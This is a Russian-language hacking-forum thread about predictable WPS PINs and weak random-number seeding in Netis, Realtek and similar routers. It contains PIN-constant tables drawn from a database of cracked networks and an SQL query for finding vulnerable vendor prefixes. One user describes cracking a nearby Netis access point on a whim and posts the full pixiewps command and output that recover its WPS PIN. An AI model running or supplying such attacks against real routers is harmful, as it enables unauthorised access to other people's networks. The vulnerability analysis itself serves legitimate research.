ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.10.2020, 04:03
|
|
Active Member
Регистрация: 17.10.2018
Сообщений: 262
Провел на форуме:
90863
Репутация:
1
|
|
А картина не так проста, как ожидалось:
1) константы бывают и сингл-, кросс-модельными;
2) и как мажорными, так и минорными (возможно, это не миноры, а просто не дефолтные пины, но некоторые из них уж очень похожи на мажоры!)
3) кросс-OUI констант пока не выявлено, но данных для этого проанализировано слишком мало (всего 6 устройств из трёх малочисленных OUI и 3 костанты соответственно)
Выборка по OUI C0:A5D и C8:E78 может прояснить ситуацию.
А пока:
Код:
+---------+-----+---+-----------------------------------------------------------------+
| const | n | m | Models |
+---------+-----+---+-----------------------------------------------------------------+
| 2732971 | 113 | 3 | 305R, hardware: 1.0 | 305R, hardware: 2.0 | 325R, hardware: 2.0 |
| 6324054 | 33 | 3 | 301R, hardware: 1.0 | 305R, hardware: 2.0 | 305R, hardware: 1.0 |
| 1418951 | 29 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 214517 | 26 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 6739656 | 21 | 2 | 301R, hardware: 1.0 | 305R, hardware: 1.0 |
| 1672762 | 9 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 2877196 | 4 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 6748288 | 262 | 1 | 301R, hardware: 2.0 |
| 3032128 | 144 | 1 | 301R, hardware: 2.0 |
| 1198183 | 76 | 1 | 301R, hardware: 2.0 |
| 2299773 | 70 | 1 | 301R, hardware: 2.0 |
| 7198110 | 39 | 1 | 305R, hardware: 2.0 |
| 9288922 | 23 | 1 | 305R, hardware: 2.0 |
| 5107645 | 22 | 1 | 301R, hardware: 2.0 |
| 1782372 | 15 | 1 | 301R, hardware: 2.0 |
| 5874232 | 14 | 1 | 301R, hardware: 2.0 |
| 5737450 | 6 | 1 | 325R, hardware: 2.0 |
| 9686483 | 5 | 1 | 325R, hardware: 2.0 |
| 2980878 | 4 | 1 | 305R, hardware: 2.0 |
| 324127 | 3 | 1 | 301R, hardware: 2.0 |
| 7782299 | 3 | 1 | 305R, hardware: 2.0 |
| 1144728 | 2 | 1 | 325R, hardware: 2.0 |
| 4538175 | 2 | 1 | 305R, hardware: 1.0 |
| 6321639 | 2 | 1 | 325R, hardware: 2.0 |
| 8639731 | 2 | 1 | 325R, hardware: 2.0 |
| 1144979 | 1 | 1 | 325R, hardware: 2.0 |
| 1198192 | 1 | 1 | 301R, hardware: 2.0 |
| 1419512 | 1 | 1 | 301R, hardware: 2.0 |
| 1419669 | 1 | 1 | 301R, hardware: 2.0 |
| 1419818 | 1 | 1 | 301R, hardware: 2.0 |
| 1639824 | 1 | 1 | 301R, hardware: 1.0 |
| 1781942 | 1 | 1 | 301R, hardware: 1.0 |
| 1782255 | 1 | 1 | 301R, hardware: 1.0 |
| 2300391 | 1 | 1 | 301R, hardware: 2.0 |
| 2733061 | 1 | 1 | 305R, hardware: 1.0 |
| 3616317 | 1 | 1 | 301R, hardware: 2.0 |
| 4191216 | 1 | 1 | 325R, hardware: 2.0 |
| 4863394 | 1 | 1 | 325R, hardware: 2.0 |
| 6740099 | 1 | 1 | 301R, hardware: 2.0 |
| 6740167 | 1 | 1 | 301R, hardware: 2.0 |
| 7097342 | 1 | 1 | er MW300R rebranded |
| 3288806 | 2 | 0 | NULL |
| 6776076 | 2 | 0 | NULL |
| 9884461 | 2 | 0 | NULL |
+---------+-----+---+-----------------------------------------------------------------+
44 rows in set (0.01 sec)
+---------+-----+---+-----------------------------------------------------------------+
| const | n | m | Models |
+---------+-----+---+-----------------------------------------------------------------+
| 214517 | 26 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 324127 | 3 | 1 | 301R, hardware: 2.0 |
| 1144728 | 2 | 1 | 325R, hardware: 2.0 |
| 1144979 | 1 | 1 | 325R, hardware: 2.0 |
| 1198183 | 76 | 1 | 301R, hardware: 2.0 |
| 1198192 | 1 | 1 | 301R, hardware: 2.0 |
| 1418951 | 29 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 1419512 | 1 | 1 | 301R, hardware: 2.0 |
| 1419669 | 1 | 1 | 301R, hardware: 2.0 |
| 1419818 | 1 | 1 | 301R, hardware: 2.0 |
| 1639824 | 1 | 1 | 301R, hardware: 1.0 |
| 1672762 | 9 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 1781942 | 1 | 1 | 301R, hardware: 1.0 |
| 1782255 | 1 | 1 | 301R, hardware: 1.0 |
| 1782372 | 15 | 1 | 301R, hardware: 2.0 |
| 2299773 | 70 | 1 | 301R, hardware: 2.0 |
| 2300391 | 1 | 1 | 301R, hardware: 2.0 |
| 2732971 | 113 | 3 | 305R, hardware: 1.0 | 305R, hardware: 2.0 | 325R, hardware: 2.0 |
| 2733061 | 1 | 1 | 305R, hardware: 1.0 |
| 2877196 | 4 | 2 | 301R, hardware: 1.0 | 301R, hardware: 2.0 |
| 2980878 | 4 | 1 | 305R, hardware: 2.0 |
| 3032128 | 144 | 1 | 301R, hardware: 2.0 |
| 3288806 | 2 | 0 | NULL |
| 3616317 | 1 | 1 | 301R, hardware: 2.0 |
| 4191216 | 1 | 1 | 325R, hardware: 2.0 |
| 4538175 | 2 | 1 | 305R, hardware: 1.0 |
| 4863394 | 1 | 1 | 325R, hardware: 2.0 |
| 5107645 | 22 | 1 | 301R, hardware: 2.0 |
| 5737450 | 6 | 1 | 325R, hardware: 2.0 |
| 5874232 | 14 | 1 | 301R, hardware: 2.0 |
| 6321639 | 2 | 1 | 325R, hardware: 2.0 |
| 6324054 | 33 | 3 | 301R, hardware: 1.0 | 305R, hardware: 2.0 | 305R, hardware: 1.0 |
| 6739656 | 21 | 2 | 301R, hardware: 1.0 | 305R, hardware: 1.0 |
| 6740099 | 1 | 1 | 301R, hardware: 2.0 |
| 6740167 | 1 | 1 | 301R, hardware: 2.0 |
| 6748288 | 262 | 1 | 301R, hardware: 2.0 |
| 6776076 | 2 | 0 | NULL |
| 7097342 | 1 | 1 | er MW300R rebranded |
| 7198110 | 39 | 1 | 305R, hardware: 2.0 |
| 7782299 | 3 | 1 | 305R, hardware: 2.0 |
| 8639731 | 2 | 1 | 325R, hardware: 2.0 |
| 9288922 | 23 | 1 | 305R, hardware: 2.0 |
| 9686483 | 5 | 1 | 325R, hardware: 2.0 |
| 9884461 | 2 | 0 | NULL |
+---------+-----+---+-----------------------------------------------------------------+
44 rows in set (0.01 sec)
|
|
|
05.10.2020, 17:04
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
Провел на форуме:
997379
Репутация:
125
|
|
Сообщение от Isica
Просьба к @binarymaster, @Felis-Sapiens и другим админам 3wifi (если таковые существуют): пожалуйста, поищите в базе другие OUI с этой уязвимостью, и сделайте по ним выборку с моделями устройств.
Поискать по запросу могу, но этот запрос не проходит, нет колонок OUI и NIC, есть только BSSID в десятиричном виде.
|
|
|
|
05.10.2020, 20:21
|
|
Active Member
Регистрация: 17.10.2018
Сообщений: 262
Провел на форуме:
90863
Репутация:
1
|
|
Сообщение от binarymaster
Поискать по запросу могу, но этот запрос не проходит, нет колонок OUI и NIC, есть только BSSID в десятиричном виде.
Тогда так:
Код:
SELECT LPAD(CONV(BSSID>>24,10,16),6,'0') OUI, COUNT(DISTINCT(FLOOR(PIN/10)))/COUNT(DISTINCT(FLOOR(PIN/10))-(BSSID&255)-(BSSID>>8&255)-(BSSID>>16&255)) y FROM [TABLE] GROUP BY OUI HAVING y>2 ORDER BY OUI;
А пока хотелось бы посмотреть выборку с моделями по C0:A5D и C8:E78--там довольно много целевых устройств.
|
|
|
|
31.10.2020, 15:28
|
|
Познавший АНТИЧАТ
Регистрация: 24.03.2012
Сообщений: 1,121
Провел на форуме:
418750
Репутация:
24
|
|
Может баг возникает при первом подключении через wps после перезагрузки? Решил на удачу сломать нетис с сильным сигналом и плохими клиентами, и сразу словил этот баг.
Код:
pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r ba:bd:fa:ee:b1:3e:a0:ca:0a:6b:18:cd:14:88:78:48:88:07:18:d8:69:dc:7a:87:dd:f0:d9:93:9d:5e:f1:7e:dd:3c:11:e7:b6:12:4c:19:32:37:26:ef:51:5f:40:92:eb:fb:cd:d9:f9:d5:13:90:6c:ed:05:c3:4d:e1:88:11:79:56:ec:15:57:a1:64:21:69:a8:79:07:09:d6:14:83:f1:6f:ce:46:fd:59:f2:b8:ed:55:23:e0:83:4b:98:07:cb:16:fb:e0:cd:4b:00:fd:da:24:2f:f5:8c:0c:a8:e2:47:d3:e3:83:a6:66:49:c3:6a:29:6d:4d:11:49:be:e3:45:40:8c:bf:1b:4b:29:99:42:8d:c3:ed:6d:07:0d:00:ca:ca:eb:14:f1:1f:dd:84:dc:2e:3f:fc:0f:14:77:6f:0d:6e:66:64:0b:c3:03:c8:51:4c:72:80:4b:21:94:63:cf:ff:84:a7:39:bd:61:05:57:ed:eb:a5:57:cd:aa:e9 -s 40:ed:69:e8:26:19:89:fd:f9:52:34:7e:23:1e:80:5f:fc:d0:f7:9a:2f:ae:be:29:02:cc:8a:7b:8c:7c:f6:5f -z d4:0b:ad:de:54:a8:36:88:aa:e0:b5:22:ee:ca:d9:91:6a:06:7c:5e:6e:79:13:eb:2b:61:5c:ee:a7:2e:7f:de -a 2b:72:3c:0f:c8:ad:41:b9:cc:17:0d:08:91:9a:21:aa:7a:7f:8e:8a:d2:27:df:b3:52:83:98:57:44:99:87:ba -n 6a:2d:d5:53:3e:cf:3d:dc:6b:bd:35:29:0a:7d:7d:62 -m 50:e4:07:36:30:d6:10:f8:74:3a:74:72:87:d9:d0:27 -v 3 --force
Код:
Pixiewps 1.4
[?] Mode: 3 (RTL819x)[*] Seed N1: -[*] Seed ES1: -[*] Seed ES2: -[*] PSK1: 198320541c5e9596caa3dbc2cfd25634[*] PSK2: 33027afb9d27de4236880b776734f16e[*] ES1: 6a2dd5533ecf3ddc6bbd35290a7d7d62[*] ES2: 6a2dd5533ecf3ddc6bbd35290a7d7d62
[+] WPS pin: 08367044
[*] Time taken: 0 s 11 ms
Такой же Netis WF2411E_RU, прошивка 2.4.41346
Странно так же и то, что точка после этого бага продолжает использовать время в качестве рандома. |
|
|
|
01.11.2020, 20:45
|
|
Постоянный
Регистрация: 30.08.2011
Сообщений: 358
Провел на форуме:
66828
Репутация:
11
|
|
Сообщение от TOX1C
Может баг возникает при первом подключении через wps после перезагрузки? Решил на удачу сломать нетис с сильным сигналом и плохими клиентами, и сразу словил этот баг.
В вашем логе нет ничего особенного. Точка генерирует три "случайных" числа. Одно из них известно (-n 6a:2d... на входе pixewps). Два других (ES1, ES2) нужно подобрать. Так вот, если realtek генерирует эти три числа в течение одной секунды то они оказываются... равны. Потому что генератор каждый раз инициализируется номером текущей секунды (Seed N1). И подбирать номер той секунды попросту не нужно. Что мы и наблюдаем в логе.
А если не равны? Тогда по известному числу (-n 6a:2d...) был бы подобран номер секунды (Seed N1) и проверялись бы Seed ES1,2 из предположения, что они по номеру где-то рядом.
|
|
|
|
01.11.2020, 20:48
|
|
Постоянный
Регистрация: 25.07.2018
Сообщений: 498
Провел на форуме:
120581
Репутация:
10
|
|
Сообщение от VasiliyP
В вашем логе нет ничего особенного. Точка генерирует три "случайных" числа. Одно из них известно (-n 6a:2d... на входе pixewps). Два других (ES1, ES2) нужно подобрать. Так вот, если realtek генерирует эти три числа в течение одной секунды то они оказываются... равны. Потому что генератор каждый раз инициализируется номером текущей секунды (Seed N1). И подбирать номер той секунды попросту не нужно. Что мы и наблюдаем в логе.
В том-то и дело, что когда seed у E-Nonce, E-S1 и E-S2 основаны на времени и равны (или отличаются в секунду-две), они печатаются напротив "Seed N1:" и "Seed N2:", то есть пользователь видит 2 timestamp, совпадающих или отличающихся в 1-2 секунды — здесь же прочерки. Что значат эти прочерки, я не разобрался, т.к. чтение исходников Pixiewps на Си я пока что не поднимаю.
|
|
|
|
01.11.2020, 20:58
|
|
Постоянный
Регистрация: 30.08.2011
Сообщений: 358
Провел на форуме:
66828
Репутация:
11
|
|
Сообщение от 4Fun
Что значат эти прочерки, я не разобрался, т.к. чтение исходников Pixiewps на Си я пока что не поднимаю.
Прочерки означают, что эти значения не вычислялись. Они нужны только для вычисления E-S1,2. Поскольку E-S1,2 оказались известны, seed не нужно вычислять.
|
|
|
|
01.11.2020, 21:01
|
|
Постоянный
Регистрация: 25.07.2018
Сообщений: 498
Провел на форуме:
120581
Репутация:
10
|
|
Сообщение от VasiliyP
Прочерки означают, что эти значения не вычислялись. Они нужны только для вычисления E-S1,2. Поскольку E-S1,2 оказались известны, seed не нужно вычислять.
Хорошо, тогда на чём основаны E-Nonce, E-S1 и E-S2, если они не вычисляются с помощью PRNG на основе текущего времени? Это какие-то константы? Если так, то об этом не говорилось в оригинальной презентации Доминика Бонгарда, а также в других источниках.
|
|
|
|
01.11.2020, 21:15
|
|
Постоянный
Регистрация: 30.08.2011
Сообщений: 358
Провел на форуме:
66828
Репутация:
11
|
|
Сообщение от 4Fun
Хорошо, тогда на чём основаны E-Nonce, E-S1 и E-S2, если они не вычисляются с помощью PRNG на основе текущего времени? Это какие-то константы?
В идеале это должны быть настоящие случайные числа. Но китайцам было лень.
|
|
|
|
02.11.2020, 01:19
|
|
Active Member
Регистрация: 26.01.2020
Сообщений: 83
Провел на форуме:
29878
Репутация:
2
|
|
Сообщение от VasiliyP
В идеале это должны быть настоящие случайные числа. Но китайцам было лень.
И они заюзали сишный rand для генерации чисел? Осталось только понять почему девайсы через n попыток перестают вычислять значения и в итоге мы берём точку с помощью pixiewps
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
